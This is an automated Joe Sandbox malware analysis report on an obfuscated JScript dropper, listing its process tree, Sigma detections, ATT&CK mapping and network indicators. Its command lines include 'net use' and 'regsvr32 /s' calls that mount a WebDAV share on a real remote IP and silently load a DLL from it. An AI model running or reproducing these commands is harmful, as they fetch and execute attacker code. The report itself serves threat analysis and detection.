Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
911966882735824909.js

Overview

General Information

Sample name:911966882735824909.js
Analysis ID:1467954
MD5:8c191d66f4255e637dad88e4af68b8a4
SHA1:511998d50a6780c570dd0c920ba1dfeae2d27a43
SHA256:7d84dcf2dd227761c0eb67814538c2d2eb6de133e7ad1977e6756f76742c9084
Tags:js
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Gathers information about network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Registers a DLL
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 7260 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7308 cmdline: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7360 cmdline: net use \\45.9.74.13@8888\DavWWWRoot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • regsvr32.exe (PID: 7636 cmdline: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js", ProcessId: 7260, ProcessName: wscript.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 45.9.74.13, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 7360, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll, CommandLine: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7308, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll, ProcessId: 7636, ProcessName: regsvr32.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat", CommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7260, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat", ProcessId: 7308, ProcessName: cmd.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js", ProcessId: 7260, ProcessName: wscript.exe
Source: Process startedAuthor: frack113: Data: Command: net use \\45.9.74.13@8888\DavWWWRoot\, CommandLine: net use \\45.9.74.13@8888\DavWWWRoot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7308, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\45.9.74.13@8888\DavWWWRoot\, ProcessId: 7360, ProcessName: net.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\45.9.74.13@8888\DavWWWRoot\, CommandLine: net use \\45.9.74.13@8888\DavWWWRoot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7308, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\45.9.74.13@8888\DavWWWRoot\, ProcessId: 7360, ProcessName: net.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 911966882735824909.jsVirustotal: Detection: 23%Perma Link

Networking

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 45.9.74.13:8888
Source: Joe Sandbox ViewASN Name: FIRST-SERVER-EU-ASRU FIRST-SERVER-EU-ASRU
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.13
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:06 GMTContent-Length: 0
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:09 GMTContent-Length: 0
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:10 GMTContent-Length: 0
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:10 GMTContent-Length: 0
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 05 Jul 2024 04:32:11 GMTContent-Length: 0
Source: net.exe, 00000003.00000002.1701789155.000002A73BDD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.74.13:8888/
Source: net.exe, 00000003.00000002.1701789155.000002A73BDD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.74.13:8888/~

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: 911966882735824909.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal72.troj.spyw.evad.winJS@8/2@0/1
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\qtgsne.batJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 911966882735824909.jsVirustotal: Detection: 23%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IHost.ScriptFullName();IWshShell3.Run("cmd /k copy "C:\Users\user\Desktop\911966882735824909.js" "%userprofile%\", "0", "false")
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\net.exe TID: 7380Thread sleep time: -30000s >= -30000sJump to behavior
Source: net.exe, 00000003.00000002.1701789155.000002A73BD59000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1701789155.000002A73BDB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\45.9.74.13@8888\DavWWWRoot\Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information121
Scripting
Valid AccountsWindows Management Instrumentation121
Scripting
11
Process Injection
1
Masquerading
OS Credential Dumping1
Network Share Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Regsvr32
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
911966882735824909.js23%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://45.9.74.13:8888/0%Avira URL Cloudsafe
http://45.9.74.13:8888/~0%Avira URL Cloudsafe
http://45.9.74.13:8888/1%VirustotalBrowse
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://45.9.74.13:8888/~net.exe, 00000003.00000002.1701789155.000002A73BDD0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://45.9.74.13:8888/net.exe, 00000003.00000002.1701789155.000002A73BDD0000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
45.9.74.13
unknownRussian Federation
200740FIRST-SERVER-EU-ASRUtrue
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1467954
Start date and time:2024-07-05 06:31:16 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 54s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Without Instrumentation
Number of analysed new started processes analysed:14
Number of new started drivers analysed:1
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:911966882735824909.js
Detection:MAL
Classification:mal72.troj.spyw.evad.winJS@8/2@0/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, rundll32.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
TimeTypeDescription
00:32:05API Interceptor1x Sleep call for process: net.exe modified
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
FIRST-SERVER-EU-ASRUSecuriteInfo.com.Linux.Siggen.9999.18967.7994.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
SecuriteInfo.com.Linux.Siggen.9999.1497.7532.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
3VzZ3X6A0z.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
AHilrcbcVQ.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
8pEaIg7H9z.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
gVI7szxmyD.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
Gd2c2uVWAg.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
8nVVPhAFPo.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
AuVsM9pz5r.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
IBtSYnSnFc.elfGet hashmaliciousMiraiBrowse
  • 45.9.75.186
No context
No context
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with very long lines (3738), with CRLF line terminators
Category:dropped
Size (bytes):5910
Entropy (8bit):4.743004411065365
Encrypted:false
SSDEEP:96:bbzgmh/bLVpmMtPlmZDBlEuRRlaMaIYNQlGVTdvaeg8D95okqwUOLacKVaD9vBax:bgmLsDGnAF9iXkmkz
MD5:8C191D66F4255E637DAD88E4AF68B8A4
SHA1:511998D50A6780C570DD0C920BA1DFEAE2D27A43
SHA-256:7D84DCF2DD227761C0EB67814538C2D2EB6DE133E7AD1977E6756F76742C9084
SHA-512:489D53109E1AD5AC237FE3652488BDBA9971C0EF66D7CD25A99E2BF777CBCC74D9B29AC6928ECF6FFCF752B367A7D103157584562CF1714D8D9A97EFEA65306B
Malicious:false
Reputation:low
Preview:/* apjasa..set apjasavjxahy=H..set apjasajniuyr=p..set apjasajcspao=c..set apjasaxxzgur=h..set apjasakshqyq=C..set apjasainkctl=M..set apjasaaeujqf=9..set apjasaujncqu=W..set apjasahtbcgp=w..set apjasacqvldm=0..set apjasafcsowl=o..set apjasaanpgeg=j..set apjasadgbype=f..set apjasasqxsli=B..set apjasanujjjp=L..set apjasawlkpwe=D..set apjasauqohjm=v..set apjasameoidz=T..set apjasahakony=N..set apjasaismyxz=K..set apjasatshirj=5..set apjasahdbpeu=P..set apjasalpvvax=1..set apjasaxltpgp=U..set apjasaqsfkgr=a..set apjasaomfvmq=k..set apjasamsxkja=Y..set apjasaoaflqg=q..set apjasajcgnxk=y..set apjasahhjaym=X..set apjasajkytzp=A..set apjasalhlgua=l..set apjasavmdgdr=2..set apjasaaisbfe=e..set apjasayohylu=4..set apjasapkpkda=Q..set apjasatjbrhw=z..set apjasaienhgr=n..set apjasasigmaq=3..set apjasaapjovf=7..set apjasaxflsiz=V..set apjasahkfuhu=R..set apjasabgsbha=8..set apjasaohzdwy=x..set apjasalbctgi=t..set apjasazbfvcz=Z..set apjasavorhxg=S..set apjasasnihmp=b..set apjasadwvhaw=G..set apjas
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Reputation:high, very likely benign file
Preview:[ZoneTransfer]....ZoneId=0
File type:ASCII text, with very long lines (3738), with CRLF line terminators
Entropy (8bit):4.743004411065365
TrID:
    File name:911966882735824909.js
    File size:5'910 bytes
    MD5:8c191d66f4255e637dad88e4af68b8a4
